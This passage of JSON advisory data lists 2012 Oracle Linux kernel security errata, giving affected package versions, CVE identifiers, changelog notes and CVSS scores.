"packageName": "ofa-2.6.32-300.38.1.el6uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.38.1.el5uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.32-300.38.1.el5uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.38.1.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.32-300.38.1.el6uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-300.38.1.el6uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-300.38.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-300.38.1.el6uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-300.38.1.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-300.38.1.el5uek-1.5.7-2.i686.rpm", "packageName": "mlnx_en-2.6.32-300.38.1.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-300.38.1.el5uekdebug-1.5.1-4.0.58.x86_64.rpm", "packageName": "ofa-2.6.32-300.38.1.el5uekdebug", "operator": "lt"}], "description": "[2.6.32-300.38.1]\r\n- [net/sfc] limit number of segments per skb on tx (Maxim Uvarov) [Orabug:\r\n 14769994] {CVE-2012-3412}", "edition": 3, "reporter": "Oracle", "published": "2012-10-19T00:00:00", "title": "Unbreakable Enterprise kernel Security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3412"], "modified": "2012-10-19T00:00:00", "id": "ELSA-2012-2041", "href": "http://linux.oracle.com/errata/ELSA-2012-2041.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:38:42", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageFilename": "python-perf-2.6.32-279.1.1.el6.i686.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageFilename": "kernel-debug-2.6.32-279.1.1.el6.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageFilename": "perf-2.6.32-279.1.1.el6.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageFilename": "kernel-headers-2.6.32-279.1.1.el6.i686.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageFilename": "kernel-2.6.32-279.1.1.el6.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageFilename": "perf-2.6.32-279.1.1.el6.i686.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.32-279.1.1.el6.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageFilename": "python-perf-2.6.32-279.1.1.el6.x86_64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "noarch", "packageFilename": "kernel-firmware-2.6.32-279.1.1.el6.noarch.rpm", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "noarch", "packageFilename": "kernel-firmware-2.6.32-279.1.1.el6.noarch.rpm", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageFilename": "kernel-2.6.32-279.1.1.el6.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.32-279.1.1.el6.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.32-279.1.1.el6.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "src", "packageFilename": "kernel-2.6.32-279.1.1.el6.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "src", "packageFilename": "kernel-2.6.32-279.1.1.el6.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.32-279.1.1.el6.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "noarch", "packageFilename": "kernel-doc-2.6.32-279.1.1.el6.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "noarch", "packageFilename": "kernel-doc-2.6.32-279.1.1.el6.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.32-279.1.1.el6.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageFilename": "kernel-devel-2.6.32-279.1.1.el6.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}], "description": "[2.6.32-279.1.1.el6]\n- [kernel] Prevent keyctl new_session from causing a panic (David Howells) [833433 827424] {CVE-2012-2745}\n- [net] ipv6/netfilter: fix null pointer dereference in nf_ct_frag6_reasm() (Petr Matousek) [833410 833412] {CVE-2012-2744}\n- [fs] nfs: Map minor mismatch error to protocol not support error (Steve Dickson) [832365 796352]\n- [fs] ext4: Fix overflow caused by missing cast in ext4_fallocate() (Lukas Czerner) [833034 830209]\n- [ata] libata: Add 2GB ATA Flash Disk/ADMA428M to DMA blacklist (Prarit Bhargava) [832363 812904]\n- [netdrv] r8169: fix typo in firmware filenames (Ivan Vecera) [832359 829211]", "edition": 3, "reporter": "Oracle", "published": "2012-07-10T00:00:00", "title": "kernel security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-2745", "CVE-2012-2744"], "modified": "2012-07-10T00:00:00", "id": "ELSA-2012-1064", "href": "http://linux.oracle.com/errata/ELSA-2012-1064.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:39:17", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.32-300.29.2.el5uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.32-300.29.2.el5uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-300.29.2.el6uek-1.5.7-0.1.i686.rpm", "packageName": "mlnx_en-2.6.32-300.29.2.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-300.29.2.el5uekdebug-1.5.7-2.i686.rpm", "packageName": "mlnx_en-2.6.32-300.29.2.el5uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-300.29.2.el5uek-1.5.7-2.i686.rpm", "packageName": "mlnx_en-2.6.32-300.29.2.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-300.29.2.el6uek-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-300.29.2.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-300.29.2.el6uekdebug-1.5.7-0.1.i686.rpm", "packageName": "mlnx_en-2.6.32-300.29.2.el6uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-headers-2.6.32-300.29.2.el5uek.i686.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-300.29.2.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-300.29.2.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-300.29.2.el5uek-1.5.1-4.0.58.x86_64.rpm", "packageName": "ofa-2.6.32-300.29.2.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-300.29.2.el6uek-1.5.1-4.0.58.x86_64.rpm", "packageName": "ofa-2.6.32-300.29.2.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.32-300.29.2.el5uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-300.29.2.el6uekdebug-1.5.1-4.0.58.x86_64.rpm", "packageName": "ofa-2.6.32-300.29.2.el6uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-300.29.2.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-300.29.2.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-headers-2.6.32-300.29.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.32-300.29.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-300.29.2.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-300.29.2.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-300.29.2.el6uekdebug-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-300.29.2.el6uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.32-300.29.2.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-300.29.2.el5uekdebug-1.5.1-4.0.58.x86_64.rpm", "packageName": "ofa-2.6.32-300.29.2.el5uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-headers-2.6.32-300.29.2.el6uek.i686.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.32-300.29.2.el6uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.32-300.29.2.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-300.29.2.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-300.29.2.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-300.29.2.el6uekdebug-1.5.7-0.1.x86_64.rpm", "packageName": "mlnx_en-2.6.32-300.29.2.el6uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "src", "packageFilename": "mlnx_en-2.6.32-300.29.2.el6uek-1.5.7-0.1.src.rpm", "packageName": "mlnx_en-2.6.32-300.29.2.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "src", "packageFilename": "mlnx_en-2.6.32-300.29.2.el6uek-1.5.7-0.1.src.rpm", "packageName": "mlnx_en-2.6.32-300.29.2.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "src", "packageFilename": "mlnx_en-2.6.32-300.29.2.el5uek-1.5.7-2.src.rpm", "packageName": "mlnx_en-2.6.32-300.29.2.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "src", "packageFilename": "mlnx_en-2.6.32-300.29.2.el5uek-1.5.7-2.src.rpm", "packageName": "mlnx_en-2.6.32-300.29.2.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-300.29.2.el6uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-300.29.2.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-300.29.2.el6uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-300.29.2.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-300.29.2.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-300.29.2.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.32-300.29.2.el5uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-300.29.2.el5uekdebug-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-300.29.2.el5uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.32-300.29.2.el5uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.32-300.29.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.32-300.29.2.el6uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.32-300.29.2.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-headers-2.6.32-300.29.2.el5uek.x86_64.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.32-300.29.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.32-300.29.2.el6uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-300.29.2.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-300.29.2.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-300.29.2.el5uek-1.5.7-2.x86_64.rpm", "packageName": "mlnx_en-2.6.32-300.29.2.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-300.29.2.el5uek-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-300.29.2.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-300.29.2.el5uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-300.29.2.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-300.29.2.el5uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-300.29.2.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-300.29.2.el5uekdebug-1.5.7-2.x86_64.rpm", "packageName": "mlnx_en-2.6.32-300.29.2.el5uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-300.29.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.32-300.29.2.el6uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-300.29.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.32-300.29.2.el5uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-300.29.2.el6uek-1.5.7-0.1.x86_64.rpm", "packageName": "mlnx_en-2.6.32-300.29.2.el6uek", "operator": "lt"}], "description": "[2.6.32-300.29.2]\n- epoll: epoll_wait() should not use timespec_add_ns() (Eric Dumazet)\n- epoll: clear the tfile_check_list on -ELOOP (Joe Jin) {CVE-2012-3375}\n- Don't limit non-nested epoll paths (Jason Baron)\n- epoll: kabi fixups for epoll limit wakeup paths (Joe Jin) {CVE-2011-1083}\n- epoll: limit paths (Jason Baron) {CVE-2011-1083}\n- eventpoll: fix comment typo 'evenpoll' (Paul Bolle)\n- epoll: fix compiler warning and optimize the non-blocking path (Shawn Bohrer)\n- epoll: move ready event check into proper inline (Davide Libenzi)\n- epoll: make epoll_wait() use the hrtimer range feature (Shawn Bohrer)\n- select: rename estimate_accuracy() to select_estimate_accuracy() (Andrew Morton)\n- cred: copy_process() should clear child->replacement_session_keyring (Oleg\n Nesterov) {CVE-2012-2745}", "edition": 3, "reporter": "Oracle", "published": "2012-07-17T00:00:00", "title": "Unbreakable Enterprise kernel Security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-1083", "CVE-2012-2745", "CVE-2012-3375"], "modified": "2012-07-17T00:00:00", "id": "ELSA-2012-2026", "href": "http://linux.oracle.com/errata/ELSA-2012-2026.html", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:47:01", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.29.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.39-200.29.2.el5uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.29.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.39-200.29.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.29.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-200.29.2.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.29.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-200.29.2.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.29.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.39-200.29.2.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.29.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.39-200.29.2.el5uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.29.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-200.29.2.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.29.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-200.29.2.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.29.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.39-200.29.2.el5uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.29.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.39-200.29.2.el6uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.29.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-200.29.2.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.29.2.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-200.29.2.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.29.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.39-200.29.2.el5uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.29.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.39-200.29.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.29.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.39-200.29.2.el5uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.29.2.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-200.29.2.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.29.2.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-200.29.2.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.29.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.39-200.29.2.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.29.2.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-200.29.2.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.29.2.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-200.29.2.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.29.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.39-200.29.2.el6uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.29.2.el5uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.39-200.29.2.el5uek.i686.rpm", 